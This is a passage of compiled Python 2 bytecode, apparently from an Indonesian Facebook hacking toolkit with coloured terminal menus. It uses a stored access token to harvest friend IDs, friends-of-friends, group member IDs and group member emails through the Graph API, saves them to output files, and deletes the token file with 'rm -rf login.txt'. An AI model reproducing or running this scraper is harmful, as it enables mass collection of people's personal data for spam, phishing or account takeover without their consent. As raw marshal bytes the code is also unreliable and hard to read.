\n\x00\x83\x00\x00\x01nd\x00|\x00\x00d\r\x00k\x02\x00r\xe9\x00t\x0b\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x0e\x00k\x02\x00r\xff\x00t\x0c\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x0f\x00k\x02\x00r\x15\x01t\r\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x10\x00k\x02\x00r+\x01t\x0e\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x11\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00R9\x00\x00\x00Rs\x00\x00\x00R&\x00\x00\x00s\r\x00\x00\x00\x1b[1;91mSegeraRt\x00\x00\x00t\x01\x00\x00\x005t\x01\x00\x00\x006t\x01\x00\x00\x007t\x01\x00\x00\x008t\x01\x00\x00\x009t\x02\x00\x00\x0010R:\x00\x00\x00(\x0f\x00\x00\x00R/\x00\x00\x00R\x7f\x00\x00\x00t\x08\x00\x00\x00id_temant\x0c\x00\x00\x00idfrom_temanR\x05\x00\x00\x00R(\x00\x00\x00R\x08\x00\x00\x00t\x0e\x00\x00\x00id_member_grupt\x0e\x00\x00\x00em_member_grupt\x0e\x00\x00\x00no_member_grupR?\x00\x00\x00t\x0f\x00\x00\x00emailfrom_temant\x08\x00\x00\x00nomor_hpt\x0c\x00\x00\x00hpfrom_temanR+\x00\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00cuih(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x7f\x00\x00\x00\x7f\x01\x00\x00s<\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\r\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00sQ\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xy*\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00j\x0c\x00d\x08\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\r\x00j\x0e\x00|\x01\x00j\x0f\x00\x83\x01\x00}\x02\x00t\x10\x00d\t\x00\x83\x01\x00\x01d\n\x00d\x0b\x00\x14GHt\x02\x00d\x0c\x00d\r\x00\x83\x02\x00}\x03\x00xr\x00|\x02\x00d\x0e\x00\x19D]f\x00}\x04\x00t\x11\x00j\x12\x00|\x04\x00d\x0f\x00\x19\x83\x01\x00\x01|\x03\x00j\x13\x00|\x04\x00d\x0f\x00\x19d\x10\x00\x17\x83\x01\x00\x01d\x11\x00t\x14\x00t\x15\x00t\x11\x00\x83\x01\x00\x83\x01\x00\x17d\x12\x00\x17|\x04\x00d\x0f\x00\x19\x17Gt\x16\x00j\x17\x00j\x18\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x13\x00\x83\x01\x00\x01q\xec\x00W|\x03\x00j\x19\x00\x83\x00\x00\x01d\x14\x00GHd\x15\x00t\x15\x00t\x11\x00\x83\x01\x00\x16GHt\x1a\x00d\x16\x00\x83\x01\x00}\x05\x00t\x00\x00j\x1b\x00d\x0c\x00d\x17\x00|\x05\x00\x17\x83\x02\x00\x01d\x18\x00|\x05\x00\x17GHt\x1a\x00d\x19\x00\x83\x01\x00\x01t\x1c\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00r\xd8\x01\x01\x01\x01d\x1a\x00GHt\x1a\x00d\x19\x00\x83\x01\x00\x01t\x1c\x00\x83\x00\x00\x01nu\x00\x04t\x1d\x00t\x1e\x00f\x02\x00k\n\x00r\x04\x02\x01\x01\x01d\x1b\x00GHt\x1a\x00d\x19\x00\x83\x01\x00\x01t\x1c\x00\x83\x00\x00\x01nI\x00\x04t\x1f\x00k\n\x00r*\x02\x01\x01\x01d\x1c\x00GHt\x1a\x00d\x19\x00\x83\x01\x00\x01t\x1c\x00\x83\x00\x00\x01n#\x00\x04t\x0b\x00j \x00j!\x00k\n\x00rL\x02\x01\x01\x01d\x1d\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x1e\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00t\x03\x00\x00\x00outs3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s0\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend id \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x10\x00\x00\x00out/id_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97mg-C\x1c\xeb\xe26\x1a?sB\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get id \x1b[1;97m....s.\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00t\x05\x00\x00\x00mkdirt\x07\x00\x00\x00OSErrorR.\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R \x00\x00\x00t\x07\x00\x00\x00idtemant\x06\x00\x00\x00appendR\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R/\x00\x00\x00t\x06\x00\x00\x00renameR\x80\x00\x00\x00t\x11\x00\x00\x00KeyboardInterruptt\x08\x00\x00\x00EOFErrorR,\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x06\x00\x00\x00R4\x00\x00\x00R\'\x00\x00\x00R\x1e\x00\x00\x00t\x02\x00\x00\x00bzRm\x00\x00\x00t\x04\x00\x00\x00done(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x87\x00\x00\x00\xa1\x01\x00\x00sb\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x13\x01\x12\x01\n\x01\t\x01\x0f\x01\x11\x01\x11\x01\x15\x01 \x00\r\x00\x11\x01\n\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\t\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xd1\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xy\xaa\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\r\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\x0f\x00\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\x0e\x00j\x0f\x00|\x04\x00j\x10\x00\x83\x01\x00}\x05\x00t\x13\x00d\x10\x00\x83\x01\x00\x01d\x11\x00d\x12\x00\x14GHt\x02\x00d\x13\x00d\x14\x00\x83\x02\x00}\x06\x00xv\x00|\x05\x00d\x15\x00\x19d\x16\x00\x19D]f\x00}\x07\x00t\x14\x00j\x15\x00|\x07\x00d\x17\x00\x19\x83\x01\x00\x01|\x06\x00j\x16\x00|\x07\x00d\x17\x00\x19d\x18\x00\x17\x83\x01\x00\x01d\x19\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17|\x07\x00d\x17\x00\x19\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1b\x00\x83\x01\x00\x01ql\x01W|\x06\x00j\x1c\x00\x83\x00\x00\x01d\x1c\x00GHd\x1d\x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d\x1e\x00\x83\x01\x00}\x08\x00t\x00\x00j\x1d\x00d\x13\x00d\x1f\x00|\x08\x00\x17\x83\x02\x00\x01d \x00|\x08\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00rX\x02\x01\x01\x01d!\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00r\x84\x02\x01\x01\x01d"\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\xaa\x02\x01\x01\x01d#\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r\xcc\x02\x01\x01\x01d$\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(%\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s*\x00\x00\x00?fields=friends.limit(90000)&access_token=s<\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend id from friend \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x1b\x00\x00\x00out/id_teman_from_teman.txtR\x11\x00\x00\x00t\x07\x00\x00\x00friendsRl\x00\x00\x00Rj\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97mg-C\x1c\xeb\xe26\x1a?sB\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get id \x1b[1;97m....s.\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x0b\x00\x00\x00idfromtemanR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\t\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00idtt\x03\x00\x00\x00jokt\x02\x00\x00\x00opR\'\x00\x00\x00R\x1e\x00\x00\x00R\x98\x00\x00\x00Rm\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x88\x00\x00\x00\xd3\x01\x00\x00st\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\n\x01\t\x01\x0f\x01\x15\x01\x11\x01\x15\x01 \x00\r\x00\x11\x01\n\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\t\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xc0\x02\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x02\x00k\n\x00rR\x00\x01\x01\x01d\x03\x00GHt\x03\x00j\x04\x00d\x04\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x05\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x03\x00j\x08\x00d\x06\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00rw\x00\x01\x01\x01n\x01\x00Xy\xa6\x01t\x03\x00j\x04\x00d\x07\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\x00\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x13\x00d\x0f\x00\x83\x01\x00\x01d\x10\x00d\x11\x00\x14GHt\x00\x00d\x12\x00d\x13\x00\x83\x02\x00}\x04\x00t\x0c\x00j\r\x00d\x14\x00|\x01\x00\x17d\x15\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\x0e\x00j\x0f\x00|\x05\x00j\x10\x00\x83\x01\x00}\x06\x00xr\x00|\x06\x00d\x16\x00\x19D]f\x00}\x07\x00t\x14\x00j\x15\x00|\x07\x00d\x17\x00\x19\x83\x01\x00\x01|\x04\x00j\x16\x00|\x07\x00d\x17\x00\x19d\x18\x00\x17\x83\x01\x00\x01d\x19\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17|\x07\x00d\x17\x00\x19\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1b\x00\x83\x01\x00\x01q[\x01W|\x04\x00j\x1c\x00\x83\x00\x00\x01d\x1c\x00GHd\x1d\x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d\x1e\x00\x83\x01\x00}\x08\x00t\x03\x00j\x1d\x00d\x12\x00d\x1f\x00|\x08\x00\x17\x83\x02\x00\x01d \x00|\x08\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x02\x00k\n\x00rG\x02\x01\x01\x01d!\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00rs\x02\x01\x01\x01d"\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\x99\x02\x01\x01\x01d#\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r\xbb\x02\x01\x01\x01d$\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(%\x00\x00\x00Ns\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00R&\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID group \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s2\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet group member id \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x13\x00\x00\x00out/member_grup.txtR\x11\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s5\x00\x00\x00/members?fields=name,id&limit=999999999&access_token=Rl\x00\x00\x00Rj\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97mg-C\x1c\xeb\xe26\x1a?sB\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get id \x1b[1;97m....s.\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x05\x00\x00\x00idmemR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\t\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R\'\x00\x00\x00t\x03\x00\x00\x00aswR\x98\x00\x00\x00t\x02\x00\x00\x00ret\x01\x00\x00\x00sRm\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x89\x00\x00\x00\x0e\x02\x00\x00sr\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\t\x01\x0f\x01\x1b\x01\x12\x01\x11\x01\x11\x01\x15\x01 \x00\r\x00\x11\x01\n\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s"\x03\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x02\x00k\n\x00rR\x00\x01\x01\x01d\x03\x00GHt\x03\x00j\x04\x00d\x04\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x05\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x03\x00j\x08\x00d\x06\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00rw\x00\x01\x01\x01n\x01\x00Xy\x08\x02t\x03\x00j\x04\x00d\x07\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\x00\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x13\x00d\x0f\x00\x83\x01\x00\x01d\x10\x00d\x11\x00\x14GHt\x00\x00d\x12\x00d\x13\x00\x83\x02\x00}\x04\x00t\x0c\x00j\r\x00d\x14\x00|\x01\x00\x17d\x15\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\x0e\x00j\x0f\x00|\x05\x00j\x10\x00\x83\x01\x00}\x06\x00x\xcb\x00|\x06\x00d\x16\x00\x19D]\xbf\x00}\x07\x00t\x0c\x00j\r\x00d\x14\x00|\x07\x00d\x17\x00\x19\x17d\x18\x00\x17|\x00\x00\x17\x83\x01\x00}\x08\x00t\x0e\x00j\x0f\x00|\x08\x00j\x10\x00\x83\x01\x00}\t\x00yt\x00t\x14\x00j\x15\x00|\t\x00d\x19\x00\x19\x83\x01\x00\x01|\x04\x00j\x16\x00|\t\x00d\x19\x00\x19d\x1a\x00\x17\x83\x01\x00\x01d\x1b\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1c\x00\x17|\t\x00d\x19\x00\x19\x17d\x1d\x00\x17|\t\x00d\x0c\x00\x19\x17d\x1a\x00\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1e\x00\x83\x01\x00\x01Wq[\x01\x04t\x11\x00k\n\x00r\x19\x02\x01\x01\x01q[\x01Xq[\x01W|\x04\x00j\x1c\x00\x83\x00\x00\x01d\x10\x00d\x11\x00\x14GHd\x1f\x00GHd \x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d!\x00\x83\x01\x00}\n\x00t\x03\x00j\x1d\x00d\x12\x00d"\x00|\n\x00\x17\x83\x02\x00\x01d#\x00|\n\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x02\x00k\n\x00r\xa9\x02\x01\x01\x01d$\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00r\xd5\x02\x01\x01\x01d%\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\xfb\x02\x01\x01\x01d&\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r\x1d\x03\x01\x01\x01d\'\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S((\x00\x00\x00Ns\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00R&\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID group \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s5\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet group member email \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x16\x00\x00\x00out/em_member_grup.txtR\x11\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s5\x00\x00\x00/members?fields=name,id&limit=999999999&access_token=Rl\x00\x00\x00Rj\x00\x00\x00s\x0e\x00\x00\x00?access_token=R?\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | 